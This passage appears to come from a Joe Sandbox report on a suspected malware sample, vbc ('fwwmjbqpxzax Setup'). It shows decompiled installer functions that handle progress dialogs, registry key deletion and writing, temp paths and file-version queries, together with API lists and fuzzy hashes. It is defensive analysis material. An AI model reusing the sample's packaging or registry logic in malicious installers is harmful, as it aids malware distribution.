                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: ?B
                          • API String ID: 2987980305-117478770
                          • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                          • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402BC5(intOrPtr _a4) {
                          				char _v68;
                          				long _t6;
                          				struct HWND__* _t7;
                          				struct HWND__* _t14;
                          
                          				if(_a4 != 0) {
                          					_t14 =  *0x417044; // 0x0
                          					if(_t14 != 0) {
                          						_t14 = DestroyWindow(_t14);
                          					}
                          					 *0x417044 = 0;
                          					return _t14;
                          				}
                          				__eflags =  *0x417044; // 0x0
                          				if(__eflags != 0) {
                          					return E00405DDC(0);
                          				}
                          				_t6 = GetTickCount();
                          				__eflags = _t6 -  *0x423eac;
                          				if(_t6 >  *0x423eac) {
                          					__eflags =  *0x423ea8; // 0x0
                          					if(__eflags == 0) {
                          						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                          						 *0x417044 = _t7;
                          						return _t7;
                          					}
                          					__eflags =  *0x423f54 & 0x00000001;
                          					if(( *0x423f54 & 0x00000001) != 0) {
                          						wsprintfA( &_v68, "... %d%%", E00402BA9());
                          						return E00404E23(0,  &_v68);
                          					}
                          				}
                          				return _t6;
                          			}








                          APIs
                          • DestroyWindow.USER32 ref: 00402BDD
                          • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00402DDA), ref: 00402BFB
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                            • Part of subcall function 00402BA9: MulDiv.KERNEL32 ref: 00402BBE
                          • wsprintfA.USER32 ref: 00402C29
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 632923820-2449383134
                          • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                          • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00402A28(void* _a4, char* _a8, long _a12) {
                          				void* _v8;
                          				char _v272;
                          				signed char _t16;
                          				long _t18;
                          				long _t25;
                          				intOrPtr* _t27;
                          				long _t28;
                          
                          				_t16 =  *0x423f50; // 0x0
                          				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                          				if(_t18 == 0) {
                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                          						__eflags = _a12;
                          						if(_a12 != 0) {
                          							RegCloseKey(_v8);
                          							L8:
                          							__eflags = 1;
                          							return 1;
                          						}
                          						_t25 = E00402A28(_v8,  &_v272, 0);
                          						__eflags = _t25;
                          						if(_t25 != 0) {
                          							break;
                          						}
                          					}
                          					RegCloseKey(_v8);
                          					_t27 = E00405DA3(2);
                          					if(_t27 == 0) {
                          						__eflags =  *0x423f50; // 0x0
                          						if(__eflags != 0) {
                          							goto L8;
                          						}
                          						_t28 = RegDeleteKeyA(_a4, _a8);
                          						__eflags = _t28;
                          						if(_t28 != 0) {
                          							goto L8;
                          						}
                          						return _t28;
                          					}
                          					return  *_t27(_a4, _a8,  *0x423f50, 0);
                          				}
                          				return _t18;
                          			}











                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                          • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00401CC1(int __edx) {
                          				void* _t17;
                          				struct HINSTANCE__* _t21;
                          				struct HWND__* _t25;
                          				void* _t27;
                          
                          				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                          				GetClientRect(_t25, _t27 - 0x40);
                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                          				if(_t17 != _t21) {
                          					DeleteObject(_t17);
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                          				return 0;
                          			}








                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                          • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                          				char _v36;
                          				char _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t26;
                          				void* _t34;
                          				signed int _t36;
                          				signed int _t39;
                          				unsigned int _t46;
                          
                          				_t46 = _a12;
                          				_push(0x14);
                          				_pop(0);
                          				_t34 = 0xffffffdc;
                          				if(_t46 < 0x100000) {
                          					_push(0xa);
                          					_pop(0);
                          					_t34 = 0xffffffdd;
                          				}
                          				if(_t46 < 0x400) {
                          					_t34 = 0xffffffde;
                          				}
                          				if(_t46 < 0xffff3333) {
                          					_t39 = 0x14;
                          					asm("cdq");
                          					_t46 = _t46 + 1 / _t39;
                          				}
                          				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                          				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                          				_t21 = _t46 & 0x00ffffff;
                          				_t36 = 0xa;
                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                          				_push(_t46 >> 0);
                          				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                          				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                          				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                          			}














                          APIs
                          • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                          • wsprintfA.USER32 ref: 004046A6
                          • SetDlgItemTextA.USER32(?,00420498), ref: 004046B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                          • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00401BAD() {
                          				signed int _t28;
                          				CHAR* _t31;
                          				long _t32;
                          				int _t37;
                          				signed int _t38;
                          				int _t42;
                          				int _t48;
                          				struct HWND__* _t52;
                          				void* _t55;
                          
                          				 *(_t55 - 0x34) = E004029CB(3);
                          				 *(_t55 + 8) = E004029CB(4);
                          				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                          					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                          				}
                          				__eflags =  *(_t55 - 0x10) & 0x00000002;
                          				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                          					 *(_t55 + 8) = E004029E8(0x44);
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                          				_push(1);
                          				if(__eflags != 0) {
                          					_t50 = E004029E8();
                          					_t28 = E004029E8();
                          					asm("sbb ecx, ecx");
                          					asm("sbb eax, eax");
                          					_t31 =  ~( *_t27) & _t50;
                          					__eflags = _t31;
                          					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                          					goto L10;
                          				} else {
                          					_t52 = E004029CB();
                          					_t37 = E004029CB();
                          					_t48 =  *(_t55 - 0x10) >> 2;
                          					if(__eflags == 0) {
                          						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                          						L10:
                          						 *(_t55 - 8) = _t32;
                          					} else {
                          						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                          						asm("sbb eax, eax");
                          						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                          					}
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                          				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                          					_push( *(_t55 - 8));
                          					E004059E3();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                          				return 0;
                          			}













                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                          • SendMessageA.USER32 ref: 00401C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                          • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403897(void* __ecx, void* __eflags) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed short _t6;
                          				intOrPtr _t11;
                          				signed int _t13;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed short* _t18;
                          				signed int _t20;
                          				signed short* _t23;
                          				intOrPtr _t25;
                          				signed int _t26;
                          				intOrPtr* _t27;
                          
                          				_t24 = "1033";
                          				_t13 = 0xffff;
                          				_t6 = E004059FC(__ecx, "1033");
                          				while(1) {
                          					_t26 =  *0x423ee4; // 0x1
                          					if(_t26 == 0) {
                          						goto L7;
                          					}
                          					_t15 =  *0x423eb0; // 0x8c0fa0
                          					_t16 =  *(_t15 + 0x64);
                          					_t20 =  ~_t16;
                          					_t18 = _t16 * _t26 +  *0x423ee0;
                          					while(1) {
                          						_t18 = _t18 + _t20;
                          						_t26 = _t26 - 1;
                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                          							break;
                          						}
                          						if(_t26 != 0) {
                          							continue;
                          						}
                          						goto L7;
                          					}
                          					 *0x423680 = _t18[1];
                          					 *0x423f48 = _t18[3];
                          					_t23 =  &(_t18[5]);
                          					if(_t23 != 0) {
                          						 *0x42367c = _t23;
                          						E004059E3(_t24,  *_t18 & 0x0000ffff);
                          						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "fwwmjbqpxzax Setup", 0xfffffffe));
                          						_t11 =  *0x423ecc; // 0x1
                          						_t27 =  *0x423ec8; // 0x8c114c
                          						if(_t11 == 0) {
                          							L15:
                          							return _t11;
                          						}
                          						_t25 = _t11;
                          						do {
                          							_t11 =  *_t27;
                          							if(_t11 != 0) {
                          								_t5 = _t27 + 0x18; // 0x8c1164
                          								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
                          							}
                          							_t27 = _t27 + 0x418;
                          							_t25 = _t25 - 1;
                          						} while (_t25 != 0);
                          						goto L15;
                          					}
                          					L7:
                          					if(_t13 != 0xffff) {
                          						_t13 = 0;
                          					} else {
                          						_t13 = 0x3ff;
                          					}
                          				}
                          			}

















                          APIs
                          • SetWindowTextA.USER32(00000000,fwwmjbqpxzax Setup), ref: 0040392F
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$fwwmjbqpxzax Setup
                          • API String ID: 530164218-2017237357
                          • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                          • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405578(CHAR* _a4) {
                          				CHAR* _t7;
                          
                          				_t7 = _a4;
                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                          					lstrcatA(_t7, 0x40900c);
                          				}
                          				return _t7;
                          			}




                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                          • CharPrevA.USER32(?,00000000), ref: 00405587
                          • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-4017390910
                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E004022F5(void* __eax) {
                          				void* _t15;
                          				char* _t18;
                          				int _t19;
                          				char _t24;
                          				int _t27;
                          				signed int _t30;
                          				intOrPtr _t35;
                          				void* _t37;
                          
                          				_t15 = E00402ADD(__eax);
                          				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                          				 *(_t37 - 0x44) = E004029E8(2);
                          				_t18 = E004029E8(0x11);
                          				_t30 =  *0x423f50; // 0x0
                          				_t31 = _t30 | 0x00000002;
                          				 *(_t37 - 4) = 1;
                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                          				if(_t19 == 0) {
                          					if(_t35 == 1) {
                          						E004029E8(0x23);
                          						_t19 = lstrlenA(0x40a368) + 1;
                          					}
                          					if(_t35 == 4) {
                          						_t24 = E004029CB(3);
                          						 *0x40a368 = _t24;
                          						_t19 = _t35;
                          					}
                          					if(_t35 == 3) {
                          						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                          					}
                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                          						 *(_t37 - 4) = _t27;
                          					}
                          					_push( *(_t37 + 8));
                          					RegCloseKey();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                          				return 0;
                          			}











                          APIs
                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402333
                          • lstrlenA.KERNEL32(0040A368,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A368,00000000), ref: 0040238C
                          • RegCloseKey.ADVAPI32(?), ref: 0040246F
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID:
                          • API String ID: 1356686001-0
                          • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                          • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
                          				char* _t18;
                          				int _t19;
                          				void* _t30;
                          
                          				_t18 = E004029E8(0xffffffee);
                          				 *(_t30 - 0x2c) = _t18;
                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                          				 *__esi = __ebx;
                          				 *(_t30 - 8) = _t19;
                          				 *__edi = __ebx;
                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                          				if(_t19 != __ebx) {
                          					__eax = GlobalAlloc(0x40, __eax);
                          					 *(__ebp + 8) = __eax;
                          					if(__eax != __ebx) {
                          						if(__eax != 0) {
                          							__ebp - 0x44 = __ebp - 0x34;
                          							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                          								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                          								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                          							}
                          						}
                          						_push( *(__ebp + 8));
                          						GlobalFree();
                          					}
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}






                          APIs
                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
